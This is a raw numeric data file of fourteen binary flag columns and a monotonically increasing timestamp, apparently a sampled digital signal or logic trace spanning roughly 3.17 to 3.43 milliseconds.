0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1718840e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1719120e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1719360e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1719400e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1719880e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1720120e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1720200e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1720360e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1720640e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1720680e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1721120e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1721360e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1721440e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1721640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1721880e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1722120e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1722360e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1722640e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1722840e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1723120e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1723400e-03 0,0,0,1,0,1,0,0,0,1,0,0,1,0,3.1723880e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1724120e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1724200e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1724400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1724640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1724880e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1725160e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1725400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1725640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1725880e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1726120e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1726400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1726640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1726920e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1727160e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1727400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1727640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1727880e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1728120e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1728400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1728640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1728920e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1729160e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1729400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1729640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1729880e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1730120e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1730360e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1730640e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1730920e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1731160e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1731400e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1731720e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1731960e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1732200e-03 0,0,0,1,0,0,0,0,0,0,0,0,1,0,3.1732440e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,0,3.1732680e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,0,3.1732760e-03 0,0,0,1,0,1,0,0,0,1,0,0,0,1,3.2976040e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,1,3.2978200e-03 1,0,0,1,0,1,0,0,0,1,0,1,0,1,3.2978480e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,1,3.2978760e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,1,3.2981800e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,1,3.2982120e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,1,3.2982600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,1,3.2982880e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,1,3.2983400e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,1,3.2983640e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,1,3.2984120e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2984360e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2984880e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2985120e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2985160e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2985400e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2985640e-03 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.2985680e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2985720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2985880e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2986120e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2986160e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2986360e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2986600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2986680e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2987120e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2987400e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2987880e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2988120e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2988600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2988880e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2989400e-03 1,0,0,1,0,0,0,0,0,1,0,0,0,0,3.2989640e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2989680e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2989880e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2990120e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2990200e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2990360e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2990600e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2990680e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2990840e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2991080e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2991160e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2991600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2991840e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2992360e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2992600e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2993080e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2993320e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2993880e-03 1,0,0,1,0,0,0,0,0,1,0,0,0,0,3.2994120e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2994160e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2994360e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2994600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2994680e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2994840e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2995080e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2995160e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2995320e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2995600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2995640e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2996120e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2996360e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2996840e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2997080e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2997600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2997840e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2998360e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2998600e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2998640e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.2998840e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.2999080e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2999160e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2999320e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.2999600e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.2999840e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3000120e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3000360e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3000600e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3000840e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3001120e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3001360e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3001640e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3001880e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3002120e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3002360e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3002600e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3002840e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3003120e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3003640e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3003880e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3003920e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3004360e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3004600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3004680e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3005120e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3005400e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3005880e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3006120e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3006600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3006880e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3006920e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3007120e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3007360e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3007440e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3007640e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3007880e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3008120e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3008360e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3008600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3008840e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3009120e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3009360e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3009640e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3009880e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3009920e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3010360e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3010600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3010680e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3010880e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3011120e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3011360e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3011640e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3011880e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3012120e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3012200e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3012600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3012880e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3013400e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3013640e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3014120e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3014360e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3014880e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3015120e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3015160e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3015400e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3015640e-03 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.3015680e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3015720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3015880e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3016120e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3016360e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3016600e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3016840e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3017120e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3017360e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3017640e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3017880e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3018120e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3018360e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3018600e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3018840e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3019120e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3019360e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3019640e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3020120e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3020360e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3020600e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3020840e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3020920e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3021400e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3021640e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3022120e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3022360e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3022880e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3023120e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3023160e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3023400e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3023640e-03 1,0,0,1,0,1,0,0,0,0,0,0,0,0,3.3023680e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3023720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3023880e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3024120e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3024360e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3024600e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3025120e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3025400e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3025880e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3026120e-03 1,0,0,1,0,0,0,0,0,1,0,0,0,0,3.3026160e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3026200e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3026600e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3026880e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3026920e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3027400e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3027640e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3028120e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3028360e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3028600e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3028840e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3029160e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3029400e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3029960e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3030200e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3030720e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3031000e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3031480e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3031720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3031800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3032200e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3032480e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3033000e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3033240e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3033480e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3033720e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3033760e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3034200e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3034480e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3034520e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3034720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3034960e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3035240e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3035480e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3035720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3035960e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3036200e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3036440e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3036520e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3037000e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3037240e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3037320e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3037440e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3037720e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3038200e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3038440e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3038520e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3038720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3038960e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3039200e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3039480e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3039720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3039960e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3040040e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3040200e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3040440e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3040520e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3041000e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3041240e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3041480e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3041720e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3041760e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3041960e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3042200e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3042280e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3042720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3043000e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3043480e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3043720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3044200e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3044480e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3045000e-03 1,0,0,1,0,0,0,0,0,1,0,0,0,0,3.3045240e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3045280e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3045480e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3045720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3045800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3045960e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3046200e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3046280e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3046720e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3047000e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3047040e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3047240e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3047480e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3047720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3047960e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3048200e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3048440e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3048720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3048960e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3049000e-03 1,0,0,1,0,1,0,0,0,1,0,0,1,0,3.3049480e-03 1,0,0,1,0,1,0,0,0,1,0,0,0,0,3.3049720e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3049800e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3049960e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3050200e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3050440e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3050720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3050960e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3051240e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3051480e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3051720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3051960e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3052200e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3052440e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3052720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3052960e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3053240e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3053480e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3053720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3053960e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3054200e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3054440e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3054720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3054960e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3055240e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3055480e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3055720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3055960e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3056200e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3056440e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3056720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3056960e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3057240e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3057480e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3057720e-03 1,0,0,1,0,0,0,0,0,0,0,0,1,0,3.3057960e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,0,3.3058200e-03 1,0,0,1,0,0,0,0,0,0,0,0,0,1,3.4295080e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,3.4297080e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,1,3.4297240e-03 0,1,0,1,0,0,0,0,0,0,0,1,0,1,3.4297560e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,1,3.4297800e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,1,3.4300840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,1,3.4301080e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,1,3.4301160e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,1,3.4301320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,1,3.4301600e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,1,3.4301800e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,1,3.4302080e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,1,3.4302360e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,1,3.4302600e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,1,3.4302840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,1,3.4303080e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,1,3.4303160e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,1,3.4303320e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4303400e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4303600e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4303880e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4304080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4304360e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4304600e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4304640e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4304840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4305080e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4305320e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4305600e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4305840e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4306080e-03 0,1,0,1,0,1,0,0,0,1,0,0,1,0,3.4306360e-03 0,1,0,1,0,1,0,0,0,1,0,0,0,0,3.4306600e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4306680e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4306840e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4307080e-03 0,1,0,1,0,0,0,0,0,0,0,0,1,0,3.4307320e-03 0,1,0,1,0,0,0,0,0,0,0,0,0,0,3.4307600e-03 